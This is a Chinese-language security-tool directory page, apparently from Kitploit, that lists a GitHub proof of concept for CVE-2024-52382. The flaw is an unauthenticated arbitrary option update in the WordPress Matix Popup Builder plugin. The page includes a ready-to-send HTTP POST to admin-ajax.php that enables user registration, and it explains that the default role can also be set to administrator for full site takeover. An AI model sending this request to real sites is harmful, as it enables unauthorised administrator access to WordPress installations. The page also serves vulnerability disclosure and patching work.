Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/randomrobbiebf/cve-2024-52382
权限提升漏洞分析漏洞利用信息收集Web安全渗透测试
GitHubrandomrobbiebf/cve-2024-52382

CVE-2024-52382

Matix Popup Builder <= 1.0.0 - 未认证的任意选项更新

查看仓库
11年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-52382

Matix Popup Builder <= 1.0.0 - 未认证的任意选项更新

描述

WordPress 的 Matix Popup Builder 插件在所有版本(包括 1.0.0)中,由于缺少对某个功能的权限检查,导致可能发生未经授权的数据修改,进而造成权限提升。这使得未认证的攻击者能够更新 WordPress 站点上的任意选项。攻击者可以利用此漏洞将默认注册用户角色更新为管理员,并启用用户注册,从而获得对易受攻击站点的管理员访问权限。

root@kitploit:~
Score: 9.8
Vendors: Medma Technologies
Products: Matix Popup Builder
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Interaction: none
Privileges: none
Attack Vector: network

POC

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/2
Host: wp-dev.ddev.site
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Priority: u=4
Te: trailers
Content-Type: application/x-www-form-urlencoded
Content-Length: 76

action=medma_mtx_insertContentValue&option_name=users_can_register&content=1
下载工具